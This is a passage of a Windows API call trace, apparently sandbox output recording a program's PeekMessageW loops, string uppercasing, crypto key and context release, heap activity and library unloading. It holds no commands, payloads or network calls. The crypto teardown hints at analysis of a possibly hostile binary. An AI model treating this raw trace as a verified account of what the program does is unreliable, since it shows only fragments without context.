out: lpMsg=0x8bf3c0) returned 0 [0187.832] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.832] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.832] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.832] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.832] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0187.832] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.832] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0187.832] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.832] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.832] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0187.832] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0187.832] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0187.832] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0187.832] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0187.832] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0187.832] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.832] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0187.833] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0187.833] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0187.833] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0187.833] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0187.833] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.833] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.833] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.833] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.833] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.833] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.834] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.834] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.835] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0187.835] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0187.835] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0187.835] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0187.835] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0187.835] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0187.835] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0187.835] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0187.835] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0187.835] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0187.835] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.835] CryptDestroyKey (hKey=0xaa5920) returned 1 [0187.835] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0187.835] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0187.835] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0187.835] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0187.835] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0187.836] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0187.836] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0187.836] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0187.836] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0187.836] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0187.836] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0187.836] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0187.836] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0187.836] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0187.836] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0187.836] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0187.836] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0187.836] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0187.837] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0187.837] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0187.837] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0187.837] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0187.837] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0187.837] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.837] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0187.837] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.837] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0187.837] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.837] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.837] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0187.837] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.837] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0187.837] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.837] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.838] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.838] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.838] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0187.838] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0187.838] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0187.838] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0187.838] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0187.838] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.838] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0187.838] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0187.838] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0187.838] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0187.838] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0187.838] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0187.838] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0187.838] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0187.838] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0187.839] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0187.839] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.839] CryptReleaseContext (hProv=0xab26f0, dwFlags=0x0) returned 1 [0187.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0187.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0187.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0187.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0187.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0187.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0187.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0187.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0187.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0187.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0187.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0187.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0187.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0187.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0187.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0187.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0187.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0187.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0187.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0187.841] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0187.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0187.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0187.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0187.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0187.841] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0187.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0187.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0187.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0187.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0187.841] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0187.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0187.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0187.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0187.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0187.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0187.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0187.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0187.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0187.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0187.842] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0187.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0187.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0187.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0187.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0187.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0187.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0187.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0187.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0187.842] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0187.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0187.842] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0187.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0187.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0187.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0187.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0187.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0187.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0187.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0187.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0187.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0187.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0187.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0187.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0187.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0187.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0187.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.843] FreeLibrary (hLibModule=0x74d40000) returned 1 [0187.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0187.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0187.843] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0187.843] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0187.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0187.844] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0187.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 